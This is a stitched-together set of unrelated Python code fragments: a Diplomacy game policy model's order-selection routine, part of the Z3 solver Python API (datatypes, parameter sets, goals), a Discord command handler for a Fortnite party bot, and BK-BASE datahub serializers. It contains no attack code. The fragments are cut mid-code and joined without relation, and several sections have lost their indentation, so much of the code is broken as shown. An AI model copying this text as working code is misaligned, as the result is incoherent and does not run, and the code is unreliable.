- if prefetch=False and with_state_value=False (default), a tuple consisting of:
1) A list of the selected orders
2) The policy details ==> {'locs', 'tokens', 'log_probs', 'draw_action', 'draw_prob'}
- if prefetch=False and with_state_value=True, a tuple consisting of:
1) A list of the selected orders
2) The policy details ==> {'locs', 'tokens', 'log_probs', 'draw_action', 'draw_prob'}
3) The state value for the given state
"""
# Determining if we need to prefetch or postfetch
fetches = kwargs.get('fetches', {})
is_prefetching = kwargs.get('prefetch', False)
is_postfetching = fetches and not is_prefetching
fetch_prefix = 'get_orders'
with_state_value = kwargs.get('with_state_value', False)
# Getting fetches
if not is_postfetching:
locs = [loc[:3] for loc in locs]
# Running policy model
fetches['%s/decode_fetches' % fetch_prefix] = self._decode_policy(locs,
state_proto,
power_name,
phase_history_proto,
possible_orders_proto,
**kwargs)
# Prefetching - We only return the fetches
if is_prefetching:
return fetches
# Otherwise, we yield on the fetches
fetches = yield process_fetches_dict(self.feedable_dataset, fetches)
# Variables
selected_orders = []
policy_details = {'locs': [],
'tokens': [],
'log_probs': [],
'draw_action': False,
'draw_prob': 0.}
state_value = 0.
# Processing
decode_fetches = fetches['%s/decode_fetches' % fetch_prefix]
if decode_fetches is None:
return tuple([selected_orders, policy_details] + ([state_value] if with_state_value else []))
if kwargs.get('use_beam', False):
results = self._process_single_beam_fetches(decode_fetches, temperature=kwargs.get('temperature', 0.))
else:
results = self._process_fetches(decode_fetches)
# Building policy details based on returned locations
for loc in results:
order_prob_token_log_probs = results[loc]
# | |
self.ctx)
    def accessor(self, i, j):
        """In Z3, each constructor has 0 or more accessor. The number of accessors is equal to the arity of the constructor.

        >>> List = Datatype('List')
        >>> List.declare('cons', ('car', IntSort()), ('cdr', List))
        >>> List.declare('nil')
        >>> List = List.create()
        >>> List.num_constructors()
        2
        >>> List.constructor(0)
        cons
        >>> num_accs = List.constructor(0).arity()
        >>> num_accs
        2
        >>> List.accessor(0, 0)
        car
        >>> List.accessor(0, 1)
        cdr
        >>> List.constructor(1)
        nil
        >>> num_accs = List.constructor(1).arity()
        >>> num_accs
        0
        """
        # Range-check the indices only in debug mode
        if z3_debug():
            _z3_assert(i < self.num_constructors(), "Invalid constructor index")
            _z3_assert(j < self.constructor(i).arity(), "Invalid accessor index")
        # Wrap the raw C accessor declaration in a Python FuncDeclRef
        return FuncDeclRef(Z3_get_datatype_sort_constructor_accessor(self.ctx_ref(), self.ast, i, j), self.ctx)
class DatatypeRef(ExprRef):
    """Datatype expressions."""

    def sort(self):
        """Return the datatype sort of the datatype expression `self`."""
        return DatatypeSortRef(Z3_get_sort(self.ctx_ref(), self.as_ast()), self.ctx)
def TupleSort(name, sorts, ctx = None):
    """Create a named tuple sort base on a set of underlying sorts
    Example:
        >>> pair, mk_pair, (first, second) = TupleSort("pair", [IntSort(), StringSort()])

    The result is a triple: the tuple sort, its single constructor declaration,
    and the list of field accessor declarations (one per sort in `sorts`).
    """
    # Bind the datatype to `tuple_sort` instead of shadowing the builtin `tuple`.
    tuple_sort = Datatype(name, ctx)
    projects = [('project%d' % i, sorts[i]) for i in range(len(sorts))]
    tuple_sort.declare(name, *projects)
    tuple_sort = tuple_sort.create()
    return tuple_sort, tuple_sort.constructor(0), [tuple_sort.accessor(0, i) for i in range(len(sorts))]
def DisjointSum(name, sorts, ctx=None):
    """Create a named tagged union sort based on a set of underlying sorts.

    Returns a pair: the sum sort and a list of (injection constructor,
    extraction accessor) pairs, one per element sort.

    Example:
        >>> sum, ((inject0, extract0), (inject1, extract1)) = DisjointSum("+", [IntSort(), StringSort()])
    """
    # NOTE: the local was previously named `sum`, shadowing the builtin;
    # renamed without changing behavior.
    dt = Datatype(name, ctx)
    for i in range(len(sorts)):
        dt.declare("inject%d" % i, ("project%d" % i, sorts[i]))
    dt = dt.create()
    return dt, [(dt.constructor(i), dt.accessor(i, 0)) for i in range(len(sorts))]
def EnumSort(name, values, ctx=None):
    """Return a new enumeration sort named `name` containing the given values.

    The result is a pair (sort, list of constants).

    Example:
        >>> Color, (red, green, blue) = EnumSort('Color', ['red', 'green', 'blue'])
    """
    if z3_debug():
        _z3_assert(isinstance(name, str), "Name must be a string")
        # BUG FIX: assert message previously read "Eumeration".
        _z3_assert(all(isinstance(v, str) for v in values), "Enumeration sort values must be strings")
        _z3_assert(len(values) > 0, "At least one value expected")
    ctx = _get_ctx(ctx)
    num = len(values)
    # ctypes arrays handed to the C API: value names in, constructor and
    # tester declarations out.
    _val_names = (Symbol * num)()
    for i in range(num):
        _val_names[i] = to_symbol(values[i])
    _values = (FuncDecl * num)()
    _testers = (FuncDecl * num)()
    name = to_symbol(name)
    S = DatatypeSortRef(Z3_mk_enumeration_sort(ctx.ref(), name, num, _val_names, _values, _testers), ctx)
    # Each enum value is a nullary constructor; applying it with no arguments
    # yields the constant expression users actually work with.
    V = [FuncDeclRef(_values[i], ctx)() for i in range(num)]
    return S, V
#########################################
#
# Parameter Sets
#
#########################################
class ParamsRef:
    """Set of parameters used to configure Solvers, Tactics and Simplifiers in Z3.

    Consider using the function `args2params` to create instances of this object.
    """

    def __init__(self, ctx=None, params=None):
        self.ctx = _get_ctx(ctx)
        if params is None:
            self.params = Z3_mk_params(self.ctx.ref())
        else:
            self.params = params
        Z3_params_inc_ref(self.ctx.ref(), self.params)

    def __deepcopy__(self, memo=None):
        # FIX: `memo` previously defaulted to the mutable `{}`.
        # The copy shares the underlying Z3 params object; __init__ bumps
        # its reference count.
        return ParamsRef(self.ctx, self.params)

    def __del__(self):
        if self.ctx.ref() is not None:
            Z3_params_dec_ref(self.ctx.ref(), self.params)

    def set(self, name, val):
        """Set parameter name with value val."""
        if z3_debug():
            _z3_assert(isinstance(name, str), "parameter name must be a string")
        name_sym = to_symbol(name, self.ctx)
        # bool must be tested before the integer branch: bool is a subclass
        # of int, so _is_int(True) would otherwise capture booleans.
        if isinstance(val, bool):
            Z3_params_set_bool(self.ctx.ref(), self.params, name_sym, val)
        elif _is_int(val):
            Z3_params_set_uint(self.ctx.ref(), self.params, name_sym, val)
        elif isinstance(val, float):
            Z3_params_set_double(self.ctx.ref(), self.params, name_sym, val)
        elif isinstance(val, str):
            Z3_params_set_symbol(self.ctx.ref(), self.params, name_sym, to_symbol(val, self.ctx))
        else:
            # Unsupported value types are rejected only in debug mode and
            # silently ignored otherwise (preserves historical behavior).
            if z3_debug():
                _z3_assert(False, "invalid parameter value")

    def __repr__(self):
        return Z3_params_to_string(self.ctx.ref(), self.params)

    def validate(self, ds):
        _z3_assert(isinstance(ds, ParamDescrsRef), "parameter description set expected")
        Z3_params_validate(self.ctx.ref(), self.params, ds.descr)
def args2params(arguments, keywords, ctx=None):
    """Convert python arguments into a Z3_params object.
    A ':' is added to the keywords, and '_' is replaced with '-'

    >>> args2params(['model', True, 'relevancy', 2], {'elim_and' : True})
    (params model true relevancy 2 elim_and true)
    """
    if z3_debug():
        _z3_assert(len(arguments) % 2 == 0, "Argument list must have an even number of elements.")
    params = ParamsRef(ctx)
    # Pair consecutive positional elements as (name, value). zip over the
    # same iterator stops at the shortest side, so a trailing unpaired
    # element is silently ignored, as before.
    pair_source = iter(arguments)
    for param_name, param_value in zip(pair_source, pair_source):
        params.set(param_name, param_value)
    for key, value in keywords.items():
        params.set(key, value)
    return params
class ParamDescrsRef:
    """Set of parameter descriptions for Solvers, Tactics and Simplifiers in Z3."""

    def __init__(self, descr, ctx=None):
        _z3_assert(isinstance(descr, ParamDescrs), "parameter description object expected")
        self.ctx = _get_ctx(ctx)
        self.descr = descr
        Z3_param_descrs_inc_ref(self.ctx.ref(), self.descr)

    def __deepcopy__(self, memo=None):
        # BUG FIX: previously returned `ParamsDescrsRef(...)` (a typo), which
        # raised NameError on every deepcopy. Also drops the mutable `{}`
        # default for `memo`.
        return ParamDescrsRef(self.descr, self.ctx)

    def __del__(self):
        if self.ctx.ref() is not None:
            Z3_param_descrs_dec_ref(self.ctx.ref(), self.descr)

    def size(self):
        """Return the size of in the parameter description `self`."""
        return int(Z3_param_descrs_size(self.ctx.ref(), self.descr))

    def __len__(self):
        """Return the size of in the parameter description `self`."""
        return self.size()

    def get_name(self, i):
        """Return the i-th parameter name in the parameter description `self`."""
        return _symbol2py(self.ctx, Z3_param_descrs_get_name(self.ctx.ref(), self.descr, i))

    def get_kind(self, n):
        """Return the kind of the parameter named `n`."""
        return Z3_param_descrs_get_kind(self.ctx.ref(), self.descr, to_symbol(n, self.ctx))

    def get_documentation(self, n):
        """Return the documentation string of the parameter named `n`."""
        return Z3_param_descrs_get_documentation(self.ctx.ref(), self.descr, to_symbol(n, self.ctx))

    def __getitem__(self, arg):
        # Integer subscripts look up a name by index; any other subscript is
        # treated as a parameter name and yields its kind.
        if _is_int(arg):
            return self.get_name(arg)
        else:
            return self.get_kind(arg)

    def __repr__(self):
        return Z3_param_descrs_to_string(self.ctx.ref(), self.descr)
#########################################
#
# Goals
#
#########################################
class Goal(Z3PPObject):
"""Goal is a collection of constraints we want to find a solution or show to be unsatisfiable (infeasible).
Goals are processed using Tactics. A Tactic transforms a goal into a set of subgoals.
A goal has a solution if one of its subgoals has a solution.
A goal is unsatisfiable if all subgoals are unsatisfiable.
"""
def __init__(self, models=True, unsat_cores=False, proofs=False, ctx=None, goal=None):
    # models/unsat_cores/proofs are forwarded to Z3_mk_goal only when a new
    # goal is created; they are ignored when wrapping an existing `goal`
    # pointer (which then requires an explicit `ctx`).
    if z3_debug():
        _z3_assert(goal is None or ctx is not None, "If goal is different from None, then ctx must be also different from None")
    self.ctx = _get_ctx(ctx)
    self.goal = goal
    if self.goal is None:
        self.goal = Z3_mk_goal(self.ctx.ref(), models, unsat_cores, proofs)
    Z3_goal_inc_ref(self.ctx.ref(), self.goal)
def __deepcopy__(self, memo=None):
    """Return a copy sharing the underlying Z3 goal pointer.

    FIX: `memo` previously defaulted to the mutable `{}`. Behavior is
    unchanged: the Goal constructor increments the shared goal's refcount,
    and the three boolean flags are ignored when an existing goal is passed.
    """
    return Goal(False, False, False, self.ctx, self.goal)
def __del__(self):
    # Guard against interpreter-shutdown ordering: the context may already
    # have been torn down when this finalizer runs.
    if self.goal is not None and self.ctx.ref() is not None:
        Z3_goal_dec_ref(self.ctx.ref(), self.goal)
def depth(self):
    """Return the depth of the goal `self`. The depth corresponds to the number of tactics applied to `self`.

    >>> x, y = Ints('x y')
    >>> g = Goal()
    >>> g.add(x == 0, y >= x + 1)
    >>> g.depth()
    0
    >>> r = Then('simplify', 'solve-eqs')(g)
    >>> # r has 1 subgoal
    >>> len(r)
    1
    >>> r[0].depth()
    2
    """
    # Thin wrapper over Z3_goal_depth.
    return int(Z3_goal_depth(self.ctx.ref(), self.goal))
def inconsistent(self):
    """Return `True` if `self` contains the `False` constraints.

    Note (see the doctest): merely adding contradictory constraints does not
    make this true; a tactic must first reduce them to the `False` constraint.

    >>> x, y = Ints('x y')
    >>> g = Goal()
    >>> g.inconsistent()
    False
    >>> g.add(x == 0, x == 1)
    >>> g
    [x == 0, x == 1]
    >>> g.inconsistent()
    False
    >>> g2 = Tactic('propagate-values')(g)[0]
    >>> g2.inconsistent()
    True
    """
    return Z3_goal_inconsistent(self.ctx.ref(), self.goal)
def prec(self):
    """Return the precision (under-approximation, over-approximation, or precise) of the goal `self`.

    >>> g = Goal()
    >>> g.prec() == Z3_GOAL_PRECISE
    True
    >>> x, y = Ints('x y')
    >>> g.add(x == y + 1)
    >>> g.prec() == Z3_GOAL_PRECISE
    True
    >>> t = With(Tactic('add-bounds'), add_bound_lower=0, add_bound_upper=10)
    >>> g2 = t(g)[0]
    >>> g2
    [x == y + 1, x <= 10, x >= 0, y <= 10, y >= 0]
    >>> g2.prec() == Z3_GOAL_PRECISE
    False
    >>> g2.prec() == Z3_GOAL_UNDER
    True
    """
    # Thin wrapper over Z3_goal_precision.
    return Z3_goal_precision(self.ctx.ref(), self.goal)
def precision(self):
    """Alias for `prec()`.

    >>> g = Goal()
    >>> g.precision() == Z3_GOAL_PRECISE
    True
    """
    return self.prec()
def size(self):
    """Return the number of constraints in the goal `self`.

    >>> g = Goal()
    >>> g.size()
    0
    >>> x, y = Ints('x y')
    >>> g.add(x == 0, y > x)
    >>> g.size()
    2
    """
    return int(Z3_goal_size(self.ctx.ref(), self.goal))
def __len__(self):
    """Return the number of constraints in the goal `self` (same as `size()`).

    >>> g = Goal()
    >>> len(g)
    0
    >>> x, y = Ints('x y')
    >>> g.add(x == 0, y > x)
    >>> len(g)
    2
    """
    return self.size()
def get(self, i):
    """Return a constraint in the goal `self`.

    `i` is forwarded unchecked to the C API; use `goal[i]` for bounds
    checking.

    >>> g = Goal()
    >>> x, y = Ints('x y')
    >>> g.add(x == 0, y > x)
    >>> g.get(0)
    x == 0
    >>> g.get(1)
    y > x
    """
    return _to_expr_ref(Z3_goal_formula(self.ctx.ref(), self.goal, i), self.ctx)
def __getitem__(self, arg):
    """Return a constraint in the goal `self`.

    Raises IndexError for out-of-range indices (negative indices are not
    supported).

    >>> g = Goal()
    >>> x, y = Ints('x y')
    >>> g.add(x == 0, y > x)
    >>> g[0]
    x == 0
    >>> g[1]
    y > x
    """
    # FIX: also reject negative indices. Previously only the upper bound was
    # checked and a negative value went straight to the native library via
    # `get`, which performs no bounds checking of its own.
    if arg < 0 or arg >= len(self):
        raise IndexError
    return self.get(arg)
def assert_exprs(self, *args):
    """Assert constraints into the goal.

    >>> x = Int('x')
    >>> g = Goal()
    >>> g.assert_exprs(x > 0, x < 2)
    >>> g
    [x > 0, x < 2]
    """
    args = _get_args(args)
    s = BoolSort(self.ctx)
    for arg in args:
        # Coerce each argument into a Boolean expression of this goal's
        # context before handing it to the C API.
        arg = s.cast(arg)
        Z3_goal_assert(self.ctx.ref(), self.goal, arg.as_ast())
def append(self, *args):
"""Add constraints.
| |
not the party leader!',
color = 0xff2929
))
return
if len(cmd) != 1:
del cmd[0]
args = ' '.join(cmd)
for member in self.party.members:
if member.display_name.lower().startswith(args.lower()):
await self.party.hide(member)
await message.channel.send(embed=discord.Embed(
description = f'**{member.display_name}** is now **hidden**',
color = 0x349eeb
))
return
await message.channel.send(embed=discord.Embed(
description = 'No member with that name was found',
color = 0xff2929
))
return
else:
await message.channel.send(embed=discord.Embed(
description = 'Usage: `hide <member name>`',
color = 0x349eeb
))
return
if cmd[0].lower() == 'show':
if self.party.leader != self.party.me:
await message.channel.send(embed=discord.Embed(
description = 'I am not the party leader!',
color = 0xff2929
))
return
if len(cmd) != 1:
del cmd[0]
args = ' '.join(cmd)
for member in self.party.members:
if member.display_name.lower().startswith(args.lower()):
await self.party.show(member)
await message.channel.send(embed=discord.Embed(
description = f'**{member.display_name}** is now **shown**',
color = 0x349eeb
))
return
await message.channel.send(embed=discord.Embed(
description = 'No member with that name was found',
color = 0xff2929
))
return
else:
await message.channel.send(embed=discord.Embed(
description = 'Usage: `hide <member name>`',
color = 0x349eeb
))
return
if cmd[0].lower() == 'match':
del cmd[0]
args = ' '.join(cmd)
if len(cmd) == 0:
await message.channel.send(embed=discord.Embed(
description = 'Usage: `match <0 to 255>`',
color = 0x349eeb
))
return
else:
try:
players_int = int(args.strip(' '))
if players_int < 0:
await message.channel.send(embed=discord.Embed(
description = 'The number can\'t be negative!',
color = 0x349eeb
))
return
elif players_int > 255:
await message.channel.send(embed=discord.Embed(
description = 'The number can\'t be more than 255!',
color = 0x349eeb
))
return
if self.in_match_timestamp == None:
self.in_match_timestamp = datetime.datetime.utcnow()
await self.party.me.set_in_match(players_left=players_int, started_at=self.in_match_timestamp)
await message.channel.send(embed=discord.Embed(
description = f'In-match state updated. {players_int} left',
color = 0x349eeb
))
return
except ValueError:
await message.channel.send(embed=discord.Embed(
description = 'Players in match must be a number between 0 and 255!',
color = 0x349eeb
))
return
except Exception as e:
await message.channel.send(embed=discord.Embed(
description = f'An uknown error ocurred: `{e}`',
color = 0x349eeb
))
traceback.print_exc()
return
if cmd[0].lower() == 'unmatch':
try:
self.in_match_timestamp = None
await self.party.me.clear_in_match()
await message.channel.send(embed=discord.Embed(
description = 'In-match state cleared.',
color = 0x349eeb
))
except Exception as e:
await message.channel.send(embed=discord.Embed(
description = f'An unknown error ocurred: {e}',
color = 0xff2929
))
if cmd[0].lower() == 'skin':
if len(cmd) != 1:
del cmd[0]
args = ' '.join(cmd)
if cmd[0].lower().startswith('cid_'):
search = await self.cosmetics.get(type_='outfit', id_=args)
result = search
else:
search = await self.cosmetics.get(type_='outfit', name=args)
result = search[0] if len(search) > 0 else []
if len(result) != 0:
await self.party.me.edit_and_keep(partial(self.party.me.set_outfit, result['id']))
await message.channel.send(embed=discord.Embed(
title = 'Set outfit',
description = f'**Name:** {result["name"]}\n**ID:** {result["id"]}',
color = 0x349eeb
).set_thumbnail(url=result['images']['icon']).set_author(name=f'{self.user.display_name} - {self.session_id}', icon_url=await self.get_outfit_icon(self.party.me.outfit)))
if self.is_custom:
util.database.users.find_one_and_update({'user_id': self.message.author.id}, {'$set': {'custom_account.outfit': result['id'], 'custom_account.outfit_variants': []}})
else:
await message.channel.send(embed=discord.Embed(
description = 'Nothing found',
color = 0xff2929
).set_author(name=f'{self.user.display_name} - {self.session_id}', icon_url=await self.get_outfit_icon(self.party.me.outfit)))
if cmd[0].lower() == 'emote':
if len(cmd) != 1:
del cmd[0]
args = ' '.join(cmd)
if cmd[0].lower().startswith('eid_'):
search = await self.cosmetics.get(type_='emote', id_=args)
result = search
else:
search = await self.cosmetics.get(type_='emote', name=args)
result = search[0] if len(search) > 0 else []
if len(result) != 0:
await self.party.me.clear_emote()
await self.party.me.edit_and_keep(partial(self.party.me.set_emote, result['id']))
await message.channel.send(embed=discord.Embed(
title = 'Set emote',
description = f'**Name:** {result["name"]}\n**ID:** {result["id"]}',
color = 0x349eeb
).set_thumbnail(url=result['images']['icon']).set_author(name=f'{self.user.display_name} - {self.session_id}', icon_url=await self.get_outfit_icon(self.party.me.outfit)))
if self.is_custom:
util.database.users.find_one_and_update({'user_id': self.message.author.id}, {'$set': {'custom_account.emote': result['id']}})
else:
await message.channel.send(embed=discord.Embed(
description = 'Nothing found',
color = 0xff2929
).set_author(name=f'{self.user.display_name} - {self.session_id}', icon_url=await self.get_outfit_icon(self.party.me.outfit)))
if cmd[0].lower() == 'backpack':
if len(cmd) != 1:
del cmd[0]
args = ' '.join(cmd)
if args.lower() == 'clear':
await self.party.me.edit_and_keep(partial(self.party.me.set_backpack, 'bid_'))
await message.channel.send(embed=discord.Embed(
description = 'Cleared backpack',
color = 0x349eeb
).set_author(name=f'{self.user.display_name} - {self.session_id}', icon_url=await self.get_outfit_icon(self.party.me.outfit)))
if self.is_custom:
util.database.users.find_one_and_update({'user_id': self.message.author.id}, {'$set': {'custom_account.backpack': '', 'custom_account.backpack_variants': []}})
return
if cmd[0].lower().startswith('bid_'):
search = await self.cosmetics.get(type_='backpack', id_=args)
result = search
else:
search = await self.cosmetics.get(type_='backpack', name=args)
result = search[0] if len(search) > 0 else []
if len(result) != 0:
await self.party.me.edit_and_keep(partial(self.party.me.set_backpack, result['id']))
await message.channel.send(embed=discord.Embed(
title = 'Set backpack',
description = f'**Name:** {result["name"]}\n**ID:** {result["id"]}',
color = 0x349eeb
).set_thumbnail(url=result['images']['icon']).set_author(name=f'{self.user.display_name} - {self.session_id}', icon_url=await self.get_outfit_icon(self.party.me.outfit)))
else:
await message.channel.send(embed=discord.Embed(
description = 'Nothing found',
color = 0xff2929
).set_author(name=f'{self.user.display_name} - {self.session_id}', icon_url=await self.get_outfit_icon(self.party.me.outfit)))
if cmd[0].lower() == 'pickaxe':
if len(cmd) != 1:
del cmd[0]
args = ' '.join(cmd)
if args.lower() == 'clear':
await self.party.me.edit_and_keep(partial(self.party.me.set_backpack, 'pickaxe_'))
util.database.users.find_one_and_update({'user_id': self.message.author.id}, {'$set': {'custom_account.pickaxe': '', 'custom_account.pickaxe_variants': []}})
await message.channel.send(embed=discord.Embed(
description = 'Cleared pickaxe',
color = 0x349eeb
).set_author(name=f'{self.user.display_name} - {self.session_id}', icon_url=await self.get_outfit_icon(self.party.me.outfit)))
if cmd[0].lower().startswith('pickaxe_'):
search = await self.cosmetics.get(type_='pickaxe', id_=args)
result = search
else:
search = await self.cosmetics.get(type_='pickaxe', name=args)
result = search[0] if len(search) > 0 else []
if len(result) != 0:
await self.party.me.edit_and_keep(partial(self.party.me.set_pickaxe, result['id']))
await self.party.me.clear_emote() #in order to show the pickaxe
await self.party.me.set_emote(asset='EID_IceKing')
await message.channel.send(embed=discord.Embed(
title = 'Set pickaxe',
description = f'**Name:** {result["name"]}\n**ID:** {result["id"]}',
color = 0x349eeb
).set_thumbnail(url=result['images']['icon']).set_author(name=f'{self.user.display_name} - {self.session_id}', icon_url=await self.get_outfit_icon(self.party.me.outfit)))
if self.is_custom:
util.database.users.find_one_and_update({'user_id': self.message.author.id}, {'$set': {'custom_account.pickaxe': result['id'], 'custom_account.pickaxe_variants': []}})
else:
await message.channel.send(embed=discord.Embed(
description = 'Nothing found',
color = 0xff2929
).set_author(name=f'{self.user.display_name} - {self.session_id}', icon_url=await self.get_outfit_icon(self.party.me.outfit)))
if cmd[0].lower() == 'style':
del cmd[0]
args = ' '.join(cmd)
if len(cmd) == 0:
await message.channel.send(embed=discord.Embed(
description = f'Usage: `style <skin / backpack / pickaxe>`',
color = 0x349eeb
).set_author(name=f'{self.user.display_name} - {self.session_id}', icon_url=await self.get_outfit_icon(self.party.me.outfit)))
return
types = {
'outfit': 'AthenaCharacter',
'backpack': 'AthenaBackpack',
'pickaxe': 'AthenaPickaxe'
}
def check(msg):
return msg.author == message.author and msg.channel == message.channel
if cmd[0] == 'skin':
cosmetic = await self.cosmetics.get('outfit', id_=self.party.me.outfit)
if cosmetic['variants'] == None:
await message.channel.send(embed=discord.Embed(
description = 'This skin do not have styles',
color = 0x349eeb
).set_author(name=f'{self.user.display_name} - {self.session_id}', icon_url=await self.get_outfit_icon(self.party.me.outfit)))
return
else:
if len(cosmetic['variants']) > 1:
categories = cosmetic['variants']
categories_str = ''
count = 0
for category in categories:
count += 1
categories_str += f'**{count}.** {category["type"]}\n'
msg = await message.channel.send(embed=discord.Embed(
title = 'Select type of variant',
description = f'{categories_str}',
color = 0x349eeb
).set_author(name=f'{self.user.display_name} - {self.session_id}', icon_url=await self.get_outfit_icon(self.party.me.outfit)))
try:
m = await self.bot.wait_for('message', check=check, timeout=300)
if m.content not in string.digits:
return
try:
category = categories[int(m.content) - 1]
except Exception:
return
except asyncio.TimeoutError:
await msg.delete()
return
else:
category = cosmetic['variants'][0]
variant_options = category['options']
variant_channel = category['channel'].lower()
options_str = ''
count = 0
for option in variant_options:
count += 1
options_str += f'**{count}.** {option["name"]}\n'
msg = await message.channel.send(embed=discord.Embed(
title = 'Select style',
description = f'{options_str}',
color = 0x349eeb
).set_author(name=f'{self.user.display_name} - {self.session_id}', icon_url=await self.get_outfit_icon(self.party.me.outfit)))
try:
m = await self.bot.wait_for('message', check=check, timeout=300)
if m.content not in string.digits:
return
try:
selected = variant_options[int(m.content) - 1]
user_selection_int = int(m.content)
except IndexError:
return
try:
variants = await get_variants(self, types['outfit'], variant_channel, user_selection_int, selected)
await self.party.me.edit_and_keep(partial(self.party.me.set_outfit, asset=cosmetic['id'], variants=variants))
except Exception as e:
await message.channel.send(embed=discord.Embed(
title = 'Error',
description = f'An uknown error ocurred:\n```py\n{traceback.format_exc()}```',
color = 0xff2929
).set_author(name=f'{self.user.display_name} - {self.session_id}', icon_url=await self.get_outfit_icon(self.party.me.outfit)))
return
await message.channel.send(embed=discord.Embed(
description = f'Skin style changed to **{selected["name"]}**',
color = 0x349eeb
).set_thumbnail(url=selected['image']).set_author(name=f'{self.user.display_name} - {self.session_id}', icon_url=await self.get_outfit_icon(self.party.me.outfit)))
if self.is_custom:
util.database.users.find_one_and_update({'user_id': self.message.author.id}, {'$set': {'custom_account.outfit_variants': variants}})
return
except asyncio.TimeoutError:
await msg.delete()
if cmd[0] == 'backpack':
cosmetic = await self.cosmetics.get('backpack', id_=self.party.me.backpack)
if cosmetic['variants'] == None:
await message.channel.send(embed=discord.Embed(
description = 'This backpack do not have styles',
color = 0x349eeb
).set_author(name=f'{self.user.display_name} - {self.session_id}', icon_url=await self.get_outfit_icon(self.party.me.outfit)))
return
else:
if len(cosmetic['variants']) > 1:
categories = cosmetic['variants']
categories_str = ''
count = 0
for category in categories:
count += 1
categories_str += f'**{count}.** {category["type"]}\n'
msg = await message.channel.send(embed=discord.Embed(
title = 'Select type of variant',
description = f'{categories_str}',
color = 0x349eeb
).set_author(name=f'{self.user.display_name} - {self.session_id}', icon_url=await self.get_outfit_icon(self.party.me.outfit)))
try:
m = await self.bot.wait_for('message', check=check, timeout=300)
if m.content not in string.digits:
return
try:
category = categories[int(m.content) - 1]
except Exception:
return
except asyncio.TimeoutError:
await msg.delete()
return
else:
category = cosmetic['variants'][0]
variant_options = category['options']
variant_channel = category['channel'].lower()
options_str = ''
count = 0
for option in variant_options:
count += 1
options_str += f'**{count}.** {option["name"]}\n'
msg = await message.channel.send(embed=discord.Embed(
title = 'Select style',
description = f'{options_str}',
color = 0x349eeb
).set_author(name=f'{self.user.display_name} - {self.session_id}', icon_url=await self.get_outfit_icon(self.party.me.outfit)))
try:
m = await self.bot.wait_for('message', check=check, timeout=300)
try:
selected = variant_options[int(m.content) - 1]
user_selection_int = int(m.content)
except IndexError:
return
try:
variants = await get_variants(self, types['backpack'], variant_channel, user_selection_int, selected)
await self.party.me.edit_and_keep(partial(self.party.me.set_backpack, asset=cosmetic['id'], variants=variants))
except Exception as e:
await message.channel.send(embed=discord.Embed(
title = 'Error',
description = f'An uknown error ocurred:\n```py\n{traceback.format_exc()}```',
color = 0xff2929
).set_author(name=f'{self.user.display_name} - {self.session_id}', icon_url=await self.get_outfit_icon(self.party.me.outfit)))
return
await message.channel.send(embed=discord.Embed(
description = f'Backpack style changed to **{selected["name"]}**',
color = 0x349eeb
).set_thumbnail(url=selected['image']).set_author(name=f'{self.user.display_name} - {self.session_id}', icon_url=await self.get_outfit_icon(self.party.me.outfit)))
| |
<reponame>Chromico/bk-base
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making BK-BASE 蓝鲸基础平台 available.
Copyright (C) 2021 THL A29 Limited, a Tencent company. All rights reserved.
BK-BASE 蓝鲸基础平台 is licensed under the MIT License.
License for BK-BASE 蓝鲸基础平台:
--------------------------------------------------------------------
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial
portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT
LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
from __future__ import absolute_import, unicode_literals
import json
import re
import time
from common.exceptions import ValidationError
from datahub.access.collectors.factory import CollectorFactory
from datahub.common.const import CLEAN, DATA_TYPE, QUEUE, RAW_DATA, STORAGE_TYPE
from datahub.databus.common_helper import find_value_by_key
from datahub.databus.model_manager import get_raw_data_by_id
from datahub.databus.settings import PULLER_HDFSICEBERG_WORKERS
from django.utils.translation import ugettext_lazy as _
from rest_framework import serializers
from datahub.databus import exceptions, settings
class ClusterSerializer(serializers.Serializer):
    """Parameters for creating a databus kafka-connect cluster."""

    cluster_name = serializers.CharField(label=_("总线任务集群名称(命名规则:xxx-xxx-x)"), required=True)
    cluster_type = serializers.ChoiceField(
        default="kafka",
        label=_("集群类型, kafka/pulsar"),
        choices=(
            (settings.TYPE_PULSAR, "pulsar"),
            (settings.TYPE_KAFKA, "kafka"),
        ),
    )
    cluster_rest_domain = serializers.CharField(label=_("集群域名"), required=True)
    cluster_rest_port = serializers.IntegerField(label=_("集群端口"), required=True)
    cluster_bootstrap_servers = serializers.CharField(label="channel domain", required=False)
    channel_name = serializers.CharField(label=_("channel名称"), required=True)
    state = serializers.CharField(label=_("状态"), required=False, allow_null=True, allow_blank=True)
    limit_per_day = serializers.IntegerField(label="集群处理能力上限", required=False, allow_null=True, min_value=0)
    priority = serializers.IntegerField(label="优先级", required=False, allow_null=True, min_value=0)
    description = serializers.CharField(label=_("描述"), required=False, allow_null=True, allow_blank=True)
    tags = serializers.ListField(label=_("标签"), required=False)
    module = serializers.CharField(label=_("module"), required=True)
    component = serializers.CharField(label=_("component"), required=True)

    def validate_cluster_type(self, value):
        """Validate the cluster_type field; only kafka/pulsar are supported.

        BUG FIX: this hook was misspelled `validata_cluster_type`, so DRF
        never invoked it, and it returned None instead of the validated
        value (a DRF `validate_<field>` method must return the value).
        The ChoiceField above enforces the same constraint declaratively;
        this hook is kept for explicitness and backward compatibility.
        """
        if value != settings.TYPE_PULSAR and value != settings.TYPE_KAFKA:
            raise ValidationError()
        return value
class ClusterUpdateSerializer(serializers.Serializer):
    """Parameters for updating a databus kafka-connect cluster."""

    cluster_name = serializers.CharField(label="集群名", required=False)
    cluster_rest_domain = serializers.CharField(label="集群域名", required=False)
    cluster_rest_port = serializers.IntegerField(label=_("集群端口"), required=False)
    cluster_bootstrap_servers = serializers.CharField(label="集群kafka域名", required=False)
